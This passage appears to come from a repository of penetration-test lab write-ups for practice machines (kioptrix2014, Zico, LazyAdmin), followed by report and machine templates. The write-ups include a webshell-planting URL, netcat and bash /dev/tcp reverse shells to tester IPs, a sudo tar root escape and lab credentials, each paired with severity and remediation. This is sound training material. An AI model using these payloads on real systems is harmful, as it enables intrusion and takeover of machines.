errors on that port if we spoof our user agent! Using the BurpSuite proxy, we can easily spoof our user agent by using the \"Match and Replace\" feature.\r\n\r\n![642f8dd49c6bded553bc000cdfb8ae0c.png](_resources/158fecfa36214df8b5c347483a9c4cec.png)\r\n\r\nWe can now access the web port 8080, and find a reference to `phptax`. Clicking the link, we access probably the most interesting system since the start of humanity...\r\n\r\n![e3443fadb57f048d5e1a7ee08931f0a1.png](_resources/74774e33076e4483ac3e35d52b3de13b.png)\r\n\r\nThere's several remote code execution vulnerabilities disclosed for this system, but most don't seem too reliable. We finally end up with [this exploit disclosure](https://www.exploit-db.com/exploits/25849), which simply seems to make one web request to place a PHP backdoor. The exploit itself is slightly unreliable, but we can easily extract and recreate the web request to place the webshell.\r\n\r\n```\r\nhttp://10.0.0.139:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E\r\n```\r\n\r\nWe can access the webshell at `/phptax/data/rce.php` and inject commands with the `?cmd=` parameter.\r\n\r\n![d237d4993fd0e89bce2bcf7740e76c4f.png](_resources/ab39cd6410114eae9114e8c1aeca9a64.png)\r\n\r\nNice! We now have reliable code execution. We can spawn reverse shell by utilizing the netcat binary as follows: `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.128 443 >/tmp/f`. To prevent certain characters from messing up the exploit, we URL-encode the whole payload and visit the following URL to trigger it.\r\n\r\n```\r\nhttp://10.0.0.139:8080/phptax/data/rce.php?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%30%2e%30%2e%31%32%38%20%34%34%33%20%3e%2f%74%6d%70%2f%66\r\n```\r\n\r\nNice, we now have a stable shell as `www`!\r\n\r\n![26bfb20bdf976426fa1da426a6115b7e.png](_resources/dc7495e481304f8991d3f2b205ed49f3.png)\r\n\r\n##### Severity\r\n\r\n`High` - Any user with access to the network this machine is on may be able to read sensitive information and/or remotely exploit the machine.\r\n\r\n##### Remediation\r\n\r\n- Don't rely on user-agents as a security measure.\r\n- Discontinue or update the `pChart` application.\r\n- Discontinue or update the `phptax` application.\r\n\r\n##### Proof\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nA user `www`, we don't seem to find much that is usable for privilege escalation. Since the system is quite old, let's look for kernel exploits.\r\n\r\n```\r\n$ uname -a\r\nFreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64\r\n```\r\n\r\nLooking for exploits for FreeBSD 9, we stumble upon [this exploit](https://www.exploit-db.com/exploits/28718) which seems interesting and relevant for our version. Let's try it out! We grab the source code, transfer it to the target system using `nc`, and compile it using `gcc` on the target (to avoid compiling issues). Running the binary, it drops us into a root shell! Awesome!\r\n\r\n##### Severity\r\n\r\n`Critical` - Any user on the machine may execute this or similar exploits to gain full control over the machine.\r\n\r\n##### Remediation\r\n\r\nPatch the operating system to the latest - or at least a more recent - version of FreeBSD.\r\n\r\n##### Proof\r\n\r\n![a95dfa6c8b04130cc0e035e71de295b1.png](_resources/2e4416476b68490a8d24e3d7ef51433f.png)\r\n\r\n### Miscellaneous notes\r\n\r\nThe author implemented a nice monitoring feature on the box, confronting with how much noise you make. I generated 35 \"level 6\" alerts, which would otherwise have had me blocked for 10 minutes each. Phew!\r\n\r\n![31ca80e6a99a0c083eb47f97fb183b07.png](_resources/d980375a0a284cd699d453a2bb24acbb.png)\r\n\r\n## System IP 10.0.100.105 (Zico)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.100.105    |\r\n| Hostname          | Zico            |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nTo exploit this machine we identified `phpLiteAdmin v1.9.3`, which allows us to write arbitrary files to the webserver. We exploit this privilege to write a webshell, which effectively grants us command execution on the server. To escalate our privileges, we abuse our sudo rights on the `tar` binary to spawn an interactive shell as root.\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\nPORT      STATE SERVICE REASON          VERSION\r\n22/tcp    open  ssh     syn-ack ttl 128 OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey:\r\n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\r\n| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98r\r\nbT0JW6+Wqa7v0K+N82xf87fVkJcXAuU/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe\r\n9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk\r\n2MHCgxkXl5G/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO/a6T/eQAAAIEAlsW/i/dUuFbRVO2zaAKwL/CFWT19Al7+njszC5FCJ2degg\r\nmF/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p\r\n9x6LxwsDw=\r\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\r\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn/OMDgb\r\nf2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6b\r\niJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM\r\n0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat\r\n|   256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\r\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2AT\r\nokB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=\r\n80/tcp    open  http    syn-ack ttl 128 Apache httpd 2.2.22 ((Ubuntu))\r\n| http-methods:\r\n|_  Supported Methods: GET HEAD POST OPTIONS\r\n|_http-server-header: Apache/2.2.22 (Ubuntu)\r\n|_http-title: Zico's Shop\r\n111/tcp   open  rpcbind syn-ack ttl 128 2-4 (RPC #100000)\r\n39881/tcp open  status  syn-ack ttl 128 1 (RPC #100024)\r\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN \r\n    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\r\n    inet 127.0.0.1/8 scope host lo\r\n    inet6 ::1/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000\r\n    link/ether 00:0c:29:e2:b0:d1 brd ff:ff:ff:ff:ff:ff\r\n    inet 10.0.100.105/24 brd 10.0.100.255 scope global eth0\r\n    inet6 fe80::20c:29ff:fee2:b0d1/64 scope link \r\n       valid_lft forever preferred_lft forever\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\nzico:sWfCsfJSPV9H3AmQzw8\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds a handful of ports open, of which SSH and HTTP are most notable. Starting with the HTTP server, we can enumerate several pages and directories on the server.\r\n\r\n```\r\n# gobuster dir -u http://10.0.100.105/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html -o gobuster.out\r\n[...]\r\n/index (Status: 200)\r\n/index.html (Status: 200)\r\n/img (Status: 301)\r\n/tools (Status: 200)\r\n/tools.html (Status: 200)\r\n/view (Status: 200)\r\n/view.php (Status: 200)\r\n/css (Status: 301)\r\n/js (Status: 301)\r\n/vendor (Status: 301)\r\n/package (Status: 200)\r\n/LICENSE (Status: 200)\r\n/less (Status: 301)\r\n/server-status (Status: 403)\r\n/dbadmin (Status: 301)\r\n```\r\n\r\nThe directory `/dbadmin` looks interesting. It has directory listing enabled, which shows us that `test_db.php` exists in that directory. Here, we can login with a default password of `admin` to find `phpLiteAdmin v1.9.3`. This system has a [known vulnerability](https://www.exploit-db.com/exploits/24044) that could allow us to write arbitrary code to PHP files, which will get executed server-side!\r\n\r\nTo exploit this vulnerability, we create a new database called `hack.php`, and populate this database with one table that has one column. We configure this column to have the following default value:\r\n\r\n```\r\n<?php echo system($_GET[\"cmd\"]);?>\r\n```\r\n\r\n> Note the double quotes! Single quotes don't work because the payload is already embedded in single quotes by the phpLiteAdmin application.\r\n\r\nIn the database settings, we see that our simple webshell is written to `/usr/databases/hack.php`. Unfortunately, we cannot access this directory. We can rename the payload to attempt to specify a new path.\r\n\r\n![53050bc09b2c873bb4e6146f335fb1e5.png](_resources/dedb017ab57246aab374a65165e16d64.png)\r\n\r\nLooking at the directory listing in `/dbadmin`, it seems to have been written correctly! Now we can visit our page to see if the webshell works correctly.\r\n\r\n```\r\n# curl http://10.0.100.105/dbadmin/cmd2.php?cmd=id --output -\r\nWtable11CREATE TABLE '1' ('e' TEXT default 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n```\r\n\r\nIn the garbled output we see that our command is interpreted by PHP. Awesome, we have command execution. We send the following request.\r\n```\r\n# curl --output - http://10.0.100.105/dbadmin/cmd2.php?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%31%30%30%2e%31%30%38%2f%34%34%33%20%30%3e%26%31%27\r\n```\r\n\r\n> This is the below in URL-encoded format.\r\n> \r\n> ```\r\n> bash -c 'bash -i >& /dev/tcp/10.0.100.108/443 0>&1'\r\n> ```\r\n\r\nWe now get a shell back as `www-data` on our listener.\r\n\r\n##### Severity\r\n\r\n`High` - An attacker with connectivity to the machine may guess the credentials for `phpLiteAdmin` and use the known vulnerability in this system to gain command execution on the machine.\r\n\r\n##### Remediation\r\n\r\n- Change the default password for `phpLiteAdmin`.\r\n- Limit access to the database where possible.\r\n\r\n##### Proof\r\n\r\n![9803287060e167bedf64c355ce888f98.png](_resources/d77016f6a7eb4770a8c82f92392d9ef7.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nAs `www-data` we have read access to most of Zico's home folder. It looks like he is experimenting with several content management systems.\r\n\r\n```\r\nwww-data@zico:/home/zico$ ls -la\r\nls -la\r\ntotal 9244\r\ndrwxr-xr-x  6 zico zico    4096 Jun 19  2017 .\r\ndrwxr-xr-x  3 root root    4096 Jun  8  2017 ..\r\n-rw-------  1 zico zico     912 Jun 19  2017 .bash_history\r\n-rw-r--r--  1 zico zico     220 Jun  8  2017 .bash_logout\r\n-rw-r--r--  1 zico zico    3486 Jun  8  2017 .bashrc\r\n-rw-r--r--  1 zico zico     675 Jun  8  2017 .profile\r\ndrw-------  2 zico zico    4096 Jun  8  2017 .ssh\r\n-rw-------  1 zico zico    3509 Jun 19  2017 .viminfo\r\n-rw-rw-r--  1 zico zico  504646 Jun 14  2017 bootstrap.zip\r\ndrwxrwxr-x 18 zico zico    4096 Jun 19  2017 joomla\r\ndrwxrwxr-x  6 zico zico    4096 Aug 19  2016 startbootstrap-business-casual-gh-pages\r\n-rw-rw-r--  1 zico zico      61 Jun 19  2017 to_do.txt\r\ndrwxr-xr-x  5 zico zico    4096 Jun 19  2017 wordpress\r\n-rw-rw-r--  1 zico zico 8901913 Jun 19  2017 wordpress-4.8.zip\r\n-rw-rw-r--  1 zico zico    1194 Jun  8  2017 zico-history.tar.gz\r\n```\r\n\r\nInspecting the files, we find database credentials in `wp-config.php` in the Wordpress directory.\r\n\r\n```\r\n$ cat wp-config.php\r\n<?php\r\n[...]\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'zico');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'zico');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'zico');\r\n\r\n/** Database Charset to use in creating database tables. */\r\ndefine('DB_CHARSET', 'utf8');\r\n\r\n/** The Database Collate type. Don't change this if in doubt. */\r\ndefine('DB_COLLATE', '');\r\n```\r\n\r\nChecking for credential re-use, we try to login to SSH with the credentials `zico:sWfCsfJSPV9H3AmQzw8`. It works, and we get a shell as Zico!\r\n\r\n![573127717a56050e7ffe4a46c0466022.png](_resources/4febeff1e4004089a5034bedfe14517d.png)\r\n\r\nRunning `sudo -l` to review Zico's sudo permissions, we find that we can execute both `tar` and `zip` as root. That's interesting! Both binaries should allow us to read files as root, but we are of course interested in gaining a full root shell.\r\n\r\n```\r\n$ sudo -l\r\nMatching Defaults entries for zico on this host:\r\n    env_reset, exempt_group=admin, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser zico may run the following commands on this host:\r\n    (root) NOPASSWD: /bin/tar\r\n    (root) NOPASSWD: /usr/bin/zip\r\n\r\n```\r\n\r\nLuckily, [this page](https://gtfobins.github.io/gtfobins/tar/#sudo) lists how we can (ab)use our sudo permissions on the `tar` binary to spawn a full root shell. For this, we simply have to run the following command.\r\n\r\n```\r\nsudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh\r\n```\r\n\r\nRunning this command we instantly get dropped into a root shell, giving us full access to the system.\r\n\r\n##### Severity\r\n\r\n`Medium` - Anyone with access to Zico's account may abuse these privileges to gain full control over the machine.\r\n\r\n##### Remediation\r\n\r\n- Restrict read access to sensitive files such as the Wordpress configuration file on a need-to-know basis.\r\n- Limit (sudo) privileges based on the principle of least privilege.\r\n- Restrict sudo privileges for binaries that allow privilege escalation, consider using POSIX capabilities instead.\r\n\r\n##### Proof\r\n\r\n![74f94c93d6915e7729c226b54f251707.png](_resources/78fa26ae3e3249a3957c46f2c205d667.png)\r\n\r\n### Miscellaneous notes\r\n\r\nThere are more vulnerabilities on the system than those listed above. Firstly, the `/view.php` page on the webserver has the `?page=` parameter that loads a webpage to show. As we can prove by entering e.g. `?page=../../var/www/index.html`, this parameter is vulnerable to local file inclusion. However, we don't seem to be able to access any additional sensitive files at this point because of the limited permissions of user `www-data`.\r\n\r\nAdditionally, We find two hashes in the `test_users` database, which we can access through `phpLiteAdmin`.\r\n\r\n![2fb0b9e0c7062e2ab12c33c227f68b46.png](_resources/0089524c21be445299eeb07d21069283.png)\r\n\r\nBoth hashes are weak and can be cracked easily using a widely available wordlist. However, both passwords seem invalid for users on the machine.\r\n\r\n```\r\n# john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5\r\nUsing default input encoding: UTF-8\r\nLoaded 2 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])\r\nWarning: no OpenMP support for this hash type, consider --fork=8\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\nzico2215@        (?)\r\n34kroot34        (?)\r\n2g 0:00:00:00 DONE (2020-05-04 04:17) 3.508g/s 21989Kp/s 21989Kc/s 26377KC/s 34mush..34greenboot\r\n```\r\n\r\n## System IP 10.0.100.107 (LazyAdmin)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 10.0.100.107    |\r\n| Hostname          | LazyAdmin       |\r\n| Exploitation Date | 04-05-2020      |\r\n| Point Value       | N/A             |\r\n\r\n### Exploitation Overview\r\n\r\nOn this machine, we find an exposed SMB share which allows us to anonymously read several files, including a file containing a password and a php configuration file which contains the database password. Since the latter also discloses a username, we can use that to sign into the SSH server. To escalate our privileges, we utilize overly broad `sudo` rights to grant ourselves a root shell.\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n# nmap -p- --min-rate 1000 -sV 10.0.100.107\r\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 05:10 EDT\r\nNmap scan report for 10.0.100.107\r\nHost is up (0.0046s latency).\r\nNot shown: 65529 closed ports\r\nPORT     STATE SERVICE     VERSION\r\n22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\r\n80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))\r\n139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n3306/tcp open  mysql       MySQL (unauthorized)\r\n6667/tcp open  irc         InspIRCd\r\nMAC Address: 00:0C:29:80:C7:69 (VMware)\r\nService Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\nlo: 127.0.0.1\r\neth0: 10.0.100.107\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\ntogie:12345\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\nNmap finds several ports open. Looking at the web server first, we find several directories that may be of interest.\r\n\r\n```\r\n# gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php\r\n[...]\r\n/index.html (Status: 200)\r\n/info.php (Status: 200)\r\n/wordpress (Status: 301)\r\n/test (Status: 301)\r\n/wp (Status: 301)\r\n/apache (Status: 301)\r\n/old (Status: 301)\r\n/javascript (Status: 301)\r\n/phpmyadmin (Status: 301)\r\n```\r\n\r\nWe find a Wordpress instance at `/wordpress` and a login page for PHPMyAdmin at `/phpmyadmin`. Unfortunately, the Wordpress instance doesn't seem to contain any vulnerable plugins, and we don't have any creds for MySQL to login to the DB.\r\n\r\n```\r\nwpscan --plugins-detection aggressive -e ap --url http://10.0.100.107/wordpress/\r\n# No notable results\r\n```\r\n\r\nWe continue our enumeration with SMB. Running `smbclient -L 10.0.100.107` returns three shares, among which the non-default and hidden share `share$`. Let's see if we can connect to that!\r\n\r\n```\r\n# smbclient //10.0.100.107/share$\r\nEnter WORKGROUP\\root's password: \r\nTry \"help\" to get a list of possible commands.\r\nsmb: \\> dir\r\n  .                                   D        0  Tue Aug 15 07:05:52 2017\r\n  ..                                  D        0  Mon Aug 14 08:34:47 2017\r\n  wordpress                           D        0  Tue Aug 15 07:21:08 2017\r\n  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017\r\n  wp                                  D        0  Tue Aug 15 06:51:23 2017\r\n  deets.txt                           N      139  Mon Aug 14 08:20:05 2017\r\n  robots.txt                          N       92  Mon Aug 14 08:36:14 2017\r\n  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017\r\n  apache                              D        0  Mon Aug 14 08:35:19 2017\r\n  index.html                          N    36072  Sun Aug  6 01:02:15 2017\r\n  info.php                            N       20  Tue Aug 15 06:55:19 2017\r\n  test                                D        0  Mon Aug 14 08:35:10 2017\r\n  old                                 D        0  Mon Aug 14 08:35:13 2017\r\n\r\n                3029776 blocks of size 1024. 1404884 blocks available\r\n```\r\n\r\nNice, we have a listing of the files hosted on the web server. Very interesting! Unfortunately, we cannot put a webshell through `put`, but we can pull interesting files and inspect them. The file `deets.txt` contains a password of `12345`, but we're not sure what the account is or who it is for. Further, we get some database credentials from the Wordpress configuration.\r\n\r\n```php\r\n# cat wp-config.php                                                 \r\n<?php                                                                                                               \r\n[...]\r\n\r\n// ** MySQL settings - You can get this info from your web host ** //\r\n/** The name of the database for WordPress */\r\ndefine('DB_NAME', 'wordpress');\r\n\r\n/** MySQL database username */\r\ndefine('DB_USER', 'Admin');\r\n\r\n/** MySQL database password */\r\ndefine('DB_PASSWORD', 'TogieMYSQL12345^^');\r\n\r\n/** MySQL hostname */\r\ndefine('DB_HOST', 'localhost');\r\n```\r\n\r\nUsing these credentials, we can succesfully log in to PHPMyAdmin. Unfortunately, this version is not vulnerable and we can't seem to access potentially interesting database tables.\r\n\r\n![915f50888d0e04ae85ae7582e06fcaf9.png](_resources/e054884fa6084498bc1ab532725145a5.png)\r\n\r\nLooking at that password, it does however disclose a possible (user)name, 'Togie'. Combining that with the password we found before we try `togie:12345` on SSH. It works!\r\n\r\n> Since we gained shell access at this point, I did not look at the IRC port that is open any further.\r\n\r\n##### Severity\r\n\r\n`Critical` - Anyone with connectivity to the target machine can gain access to sensitive files through the exposed share, and potentially guess or bruteforce the weak credentials to gain SSH access to the machine.\r\n\r\n##### Remediation\r\n\r\n- Choose stronger passwords for services, especially external services such as SSH.\r\n- Limit (database) account privileges according to least privilege.\r\n- Limit network access to SSH and MySQL if remote access to these ports is not required.\r\n\r\n##### Proof\r\n\r\n![79550bc5070dbaccbc95e0795d41a50f.png](_resources/4a37b0a8091645d7a6b5ebfb1b94710b.png)\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\nFrom the last screenshot (`id`), we notice we are in the `sudo` group. Running `sudo -l` and specifying the password of 12345 shows us that we can run *all* commands as root, which means we can trivially escalate our privileges by running `sudo su`!\r\n\r\n##### Severity\r\n\r\n`High` - Anyone with access to the `sudo` group or similar privileges in the `sudoers` file can trivially gain full control over the system.\r\n\r\n##### Remediation\r\n\r\nLimit `sudo` privileges on a least-privilege basis.\r\n\r\n##### Proof\r\n\r\n![6b320de16f8019995f35475af9004dd2.png](_resources/e6f2888300044268a027062aa4973311.png)"
  },
  {
    "path": "Lab Report template.md",
    "content": "# Offensive Security - Penetration Test Report for PWK Internal Labs\r\n\r\n<!-- Insert your details here -->\r\n[email@email.email]\r\nOSID: [OS-XXXXX]\r\n[Date]\r\n\r\n# Outline\r\n## Introduction\r\n\r\nThe Offensive Security Lab penetration test report contains all efforts that were conducted in order to pass the Offensive Security Lab. This report will be graded from a standpoint of correctness and fullness to all aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.\r\n\r\n## Objective\r\n\r\nThe objective of this assessment is to perform an internal penetration test against the Offensive Security Lab network. The student is tasked with following a methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.\r\n\r\n## Requirements\r\n\r\nThe student will be required to fill out this penetration testing report fully and to include the following sections:\r\n\r\n- Overall High-Level Summary and Recommendations (non-technical)\r\n- Methodology walkthrough and detailed outline of steps taken\r\n- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable\r\n- Any additional items that were not included\r\n\r\n# High-Level Summary\r\n\r\nThe author of this report was tasked with performing an internal penetration test towards the Offensive Security Lab environment. An internal penetration test is a dedicated offensive simulation against internally connected systems. The focus of this test is to perform attacks, similar to those of a malicious hacker and attempt to infiltrate Offensive Security’s internal Lab systems – including but not limited to the THINC.local domain. The overall objective was to evaluate the network, identify systems, and exploit vulnerabilities, ultimately reporting findings back to Offensive Security.\r\n\r\nDuring the assessment, several alarming vulnerabilities were identified on Offensive Security’s networks. When performing the attacks, the author was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the tests, all systems were succesfully compromised, granting full control over every system in the network. These systems, as well as a brief description on how access was obtained, are listed in the section below.\r\n\r\n## Overview of Compromised Machines\r\n\r\nIt should be noted that this section solely provides a high-level description of the vulnerability which was exploited to gain a foothold on the machine. For details on lateral movement and privilege escalation within each box, please refer to the details provided in the ‘exploitation details’ chapters.\r\n\r\n<!-- Update the below sections with the right subnets, hosts, and a brief description of the initial exploited vulnerability -->\r\n**Public Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n**Other Subnet**\r\n\r\n- X.X.X.X (Hostname) - Initial Vulnerability\r\n\r\n## Recommendations\r\n\r\nIt is strongly recommended to patch the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. For each application, patching recommendations are provided.\r\n\r\nOne thing to note is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.\r\n\r\n# Methodologies\r\n\r\nA widely adopted approach to performing penetration testing was utilized during the tests to test how well the Offensive Security Lab environments are secured.\r\nBelow, a breakdown of the applied methodology is provided. \r\n\r\n## Information Gathering\r\n\r\nThe information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, the objective was to exploit the exam network. Three IP ranges were in scope:\r\n\r\n<!-- Update the list of subnets -->\r\n- The 'Public' subnet: X.X.X.X/24\r\n- Another subnet: X.X.X.X/24\r\n\r\nAs part of the Information Gathering phase, both passive and active scans were performed to gather information about open ports and running services.\r\n\r\n## Penetration\r\n\r\n<!-- Update this paragraph with the appropriate amount of compromised machines -->\r\nThe penetration testing portions of the assessment focus on gaining access to a variety of systems. During this penetration test, **[X]** out of **67** systems were succesfully and completely compromised. The next chapters provide an overview of the identified services and exploited vulnerabilities for every machine, as well as the proof keys for every compromised machine and recommendations for mitigating the identified vulnerabilities.\r\n\r\n## Maintaining Access\r\n\r\nMaintaining access to a system is important to attackers, ensuring that access to a system can be regained after it has been exploited is invaluable.\r\nThe 'maintaining access' phase of the penetration test focuses on ensuring that once the attack has been executed, an attacker can easily regain administrative access over the system. Additionally, certain exploits may only be executable once. As such, having a foothold into a system proves invaluable.\r\n\r\n## Lateral Movement\r\n\r\nAs part of the engagement, exploitation in closed subnets was requested by Offensive Security, requiring lateral movement from compromised hosts. Furthermore, lateral movement within subnets was realized through the use of known credentials from compromised hosts. Technical details on lateral movement are provided in the next chapter, and a full overview of compromised credentials is provided in the appendix.\r\n\r\n## House Cleaning\r\n\r\nThe 'house cleaning' portions of the assessment ensures that remnants of the penetration test are removed.\r\nOften fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.\r\nEnsuring that no remnants of our penetration test are left over is important.\r\n\r\nAfter all proof keys were collected from the lab networks, all user accounts, passwords, as well as the Meterpreter services installed on the system were removed. Offensive Security should not have to remove any additional backdoors, user accounts, or files from the system.\r\n\r\n# Exploitation Details: Public Subnet (X.X.X.X/24)\r\n\r\n<!-- Insert machine write-ups from .md template here -->\r\n\r\n# Exploitation Details: Public Subnet (X.X.X.X/24)\r\n\r\n<!-- Insert machine write-ups from .md template here -->\r\n\r\n# Appendix A - Lab Exercises\r\n\r\n<!-- Insert your notes here -->\r\n\r\n# Appendix B - Compromised Credentials\r\n<!-- Optional, you can dump the credentials that you harvested in this chapter -->\r\nAs part of the engagement, several sets of credentials were found on compromised machines. Some credentials were found in hashed form and cracked, indicating the weakness of these credentials. For the sake of full disclosure, these credentials are disclosed below. Note that they should be rotated as soon as possible.\r\n\r\n## Personal accounts\r\n```plaintext\r\nCREDENTIALS:HERE\r\n```\r\n\r\n## Non-personal accounts\r\n```plaintext\r\nCREDENTIALS:HERE\r\n```"
  },
  {
    "path": "Machine template.md",
    "content": "## System IP XXX.XXX.XXX.XXX (HOSTNAME)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 192.168.255.255 |\r\n| Hostname          | ExampleName     |\r\n| Exploitation Date | 99-99-9999      |\r\n| Point Value       | 25              |\r\n\r\n### Exploitation Overview\r\n\r\n<!-- Provide a brief description of the vulnerabilities and exploitation process -->\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n#### Portscan - UDP \r\n<!-- Remove if not applicable -->\r\n```plaintext\r\n\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\n##### Severity\r\n\r\n##### Remediation\r\n\r\n##### Proof\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\n##### Severity\r\n\r\n##### Remediation\r\n\r\n##### Proof\r\n\r\n### Miscellaneous notes\r\n<!-- Use this section to keep notes for yourself 